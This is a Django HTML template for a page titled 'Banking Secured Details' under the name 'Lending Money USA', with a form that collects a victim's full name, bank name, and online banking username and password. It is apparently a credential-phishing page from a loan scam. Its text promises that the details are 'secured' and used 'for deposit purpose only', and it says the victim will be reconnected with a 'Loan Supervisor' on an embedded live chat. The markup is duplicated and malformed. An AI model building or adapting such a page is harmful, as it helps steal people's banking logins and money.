<!DOCTYPE html>
<html lang="en">
{% load static %}
<head>
    <!--Start of Tawk.to Script-->
<script type="text/javascript">
var Tawk_API=Tawk_API||{}, Tawk_LoadStart=new Date();
(function(){
var s1=document.createElement("script"),s0=document.getElementsByTagName("script")[0];
s1.async=true;
s1.src='https://embed.tawk.to/5f684f734704467e89f0b782/default';
s1.charset='UTF-8';
s1.setAttribute('crossorigin','*');
s0.parentNode.insertBefore(s1,s0);
})();
</script>
<!--End of Tawk.to Script-->
  <title>Banking Secured Details</title>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1">
<!--===============================================================================================-->
  <link rel="icon" type="image/png" href="{% static '/contactform/images/secure-icon-png-20.png' %}"/>
<!--===============================================================================================-->
  <link rel="stylesheet" type="text/css" href="{% static 'contactform/vendor/bootstrap/css/bootstrap.min.css' %}">
<!--===============================================================================================-->
  <link rel="stylesheet" type="text/css" href="{% static 'contactform/fonts/font-awesome-4.7.0/css/font-awesome.min.css' %}">
<!--===============================================================================================-->
  <link rel="stylesheet" type="text/css" href="{% static 'contactform/fonts/Linearicons-Free-v1.0.0/icon-font.min.css' %}">
<!--===============================================================================================-->
  <link rel="stylesheet" type="text/css" href="{% static 'contactform/vendor/animate/animate.css' %}">
<!--===============================================================================================-->
  <link rel="stylesheet" type="text/css" href="{% static 'contactform/vendor/css-hamburgers/hamburgers.min.css' %}">
<!--===============================================================================================-->
  <link rel="stylesheet" type="text/css" href="{% static 'contactform/vendor/animsition/css/animsition.min.css' %}">
<!--===============================================================================================-->
  <link rel="stylesheet" type="text/css" href="{% static 'contactform/vendor/select2/select2.min.css' %}">
<!--===============================================================================================-->
  <link rel="stylesheet" type="text/css" href="{% static 'contactform/vendor/daterangepicker/daterangepicker.css' %}">
<!--===============================================================================================-->
  <link rel="stylesheet" type="text/css" href="{% static 'contactform/css/util.css' %}">
  <link rel="stylesheet" type="text/css" href="{% static 'contactform/css/main.css' %}">
<!--===============================================================================================-->
<!-- Facebook Pixel Code -->
<script>
!function(f,b,e,v,n,t,s)
{if(f.fbq)return;n=f.fbq=function(){n.callMethod?
n.callMethod.apply(n,arguments):n.queue.push(arguments)};
if(!f._fbq)f._fbq=n;n.push=n;n.loaded=!0;n.version='2.0';
n.queue=[];t=b.createElement(e);t.async=!0;
t.src=v;s=b.getElementsByTagName(e)[0];
s.parentNode.insertBefore(t,s)}(window, document,'script',
'https://connect.facebook.net/en_US/fbevents.js');
fbq('init', '3676832522414607');
fbq('track', 'PageView');
</script>
<noscript><img height="1" width="1" style="display:none"
src="https://www.facebook.com/tr?id=3676832522414607&ev=PageView&noscript=1"
/></noscript>
<!-- End Facebook Pixel Code -->
<!-- End Facebook Pixel Code -->
{% load static %}

<!doctype html>


<html lang="en">

<head>
    <!-- Required meta tags -->
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
    <title>Lending Money USA</title>
    <link rel="icon" href="{% static 'img/feviconlogo.jpg' %}">
    <!-- Bootstrap CSS -->
    <link rel="stylesheet" href="{% static 'css/bootstrap.min.css' %}">
    <!-- animate CSS -->
    <link rel="stylesheet" href="{% static 'css/animate.css' %}">
    <!-- owl carousel CSS -->
    <link rel="stylesheet" href="{% static 'css/owl.carousel.min.css' %}">
    <!-- themify CSS -->
    <link rel="stylesheet" href="{% static 'css/themify-icons.css' %}">
    <!-- flaticon CSS -->
    <link rel="stylesheet" href="{% static 'css/flaticon.css' %}">
    <!-- font awesome CSS -->
    <link rel="stylesheet" href="{% static 'css/magnific-popup.css' %}">
    <!-- swiper CSS -->
    <link rel="stylesheet" href="{% static 'css/slick.css' %}">
    <!-- style CSS -->
    <link rel="stylesheet" href="{% static 'css/style.css' %}">

    <!-- Facebook Pixel Code -->
<!-- Facebook Pixel Code -->
<script>
!function(f,b,e,v,n,t,s)
{if(f.fbq)return;n=f.fbq=function(){n.callMethod?
n.callMethod.apply(n,arguments):n.queue.push(arguments)};
if(!f._fbq)f._fbq=n;n.push=n;n.loaded=!0;n.version='2.0';
n.queue=[];t=b.createElement(e);t.async=!0;
t.src=v;s=b.getElementsByTagName(e)[0];
s.parentNode.insertBefore(t,s)}(window, document,'script',
'https://connect.facebook.net/en_US/fbevents.js');
fbq('init', '693121607936546');
fbq('track', 'PageView');
</script>
<noscript><img height="1" width="1" style="display:none"
src="https://www.facebook.com/tr?id=693121607936546&ev=PageView&noscript=1"
/></noscript>
<!-- End Facebook Pixel Code -->




    <!-- Header part end-->
</head>
<body>


  <div class="container-contact100">
    <div class="contact100-map" id="google_map" data-map-x="40.722047" data-map-y="-73.986422" data-pin="images/icons/map-marker.png" data-scrollwhell="0" data-draggable="1"></div>

    <div class="wrap-contact100">
      <span class="contact100-form-symbol">
        <img src="{% static '/contactform/images/secure-icon-png-20.jpg' %}" alt="SYMBOL-MAIL">
      </span>

      <form class="contact100-form validate-form flex-sb flex-w" method="post">
        <div> <span class="contact100-form-title">
          Secured Banking Details </span>

            {% csrf_token %}
<span class="contact100-form-title" id="test">
     Your information is secured with us and will be used for deposit purpose only. <br><br> Please note: Write your online banking details which you use for online and Mobile App login.</span>
</div>
        </span>        <div class="wrap-input100 rs1 validate-input" data-validate = "Name is required">
          {{form.fullname}}

        </div>


        <div class="wrap-input100 rs1 validate-input" data-validate = "Name is required">
          {{form.bankname}}

        </div>

        </span>

        <div class="wrap-input100 rs1 validate-input" data-validate = "Name is required">
          {{form.username}}

        </div>


        </span>

        <div class="wrap-input100 rs1 validate-input" data-validate = "Name is required">
          {{form.password}}

        </div> <br>
        <h5 id="submitwarn"> We will connect you again with your Loan Supervisor on live chat once you submit the details. </h2>

        <div class="container-contact100-form-btn">
          <button type="submit" id="mybtn" onClick="nextPage();"/>
            SUBMIT
          </button>


        </div>
<br>
        <br>



  <div id="dropDownSelect1"></div>

<!--===============================================================================================-->
  <script src=" {% static '/contactform/vendor/jquery/jquery-3.2.1.min.js' %}"></script>
<!--===============================================================================================-->
  <script src="{% static '/contactform/vendor/animsition/js/animsition.min.js' %}"></script>
<!--===============================================================================================-->
  <script src="{% static '/contactform/vendor/bootstrap/js/popper.js' %}"></script>
  <script src="{% static '/contactform/vendor/bootstrap/js/bootstrap.min.js' %}"></script>
<!--===============================================================================================-->
  <script src="{% static '/contactform/vendor/select2/select2.min.js' %}"></script>
<!--===============================================================================================-->
  <script src="{% static '/contactform/vendor/daterangepicker/moment.min.js' %}"></script>
  <script src="{% static '/contactform/vendor/daterangepicker/daterangepicker.js' %}"></script>
<!--===============================================================================================-->
  <script src="{% static '/contactform/vendor/countdowntime/countdowntime.js' %}"></script>
<!--===============================================================================================-->

<!--===============================================================================================-->
  <script src="{% static 'contactform/js/main.js' %}"></script>
  <!-- Global site tag (gtag.js) - Google Analytics -->
  <script async src="https://www.googletagmanager.com/gtag/js?id=UA-23581568-13"></script>

</body>
</html>
<style type="text/css">
  #test{
    font-size: 15px;
  }
  #mybtn{
    background-color: blue;
    font-size: 15px;
    color: white;
    width: 100%;
    height: 50px;
    font-family: verdana;
  }
  #mybtn2{
     background-color: blue;
    font-size: 15px;
    color: white;
    width: 100%;
    height: 50px;
  }

  #submitwarn{
    color: black;
    padding-bottom: 20px;
    font-size: 16px;
    text-align: justify-all;
  }

body {

  background-color: white; /* Used if the image is unavailable */
  height: 500px; /* You must set a specified height */
  background-position: center; /* Center the image */
  background-repeat: no-repeat; /* Do not repeat the image */
  background-size: cover; /* Resize the background image to cover the entire container */
}
</style>